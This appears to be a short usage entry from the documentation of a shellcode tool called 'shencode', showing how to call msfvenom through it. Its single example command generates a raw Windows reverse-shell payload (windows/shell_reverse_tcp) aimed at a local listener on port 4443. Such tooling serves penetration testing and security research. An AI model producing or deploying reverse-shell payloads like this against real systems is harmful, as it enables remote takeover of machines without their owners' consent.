Create Shellcodes with msfvenom
Description
You can create your payloads with the metasploit framework. Please make sure your msf binary directory is included to %PATH%
Command
python shencode.py msvenom --cmd="-p windows/shell_reverse_tcp LHOST=127.0.0.1 LPORT=4443 -f raw -o payload.bin"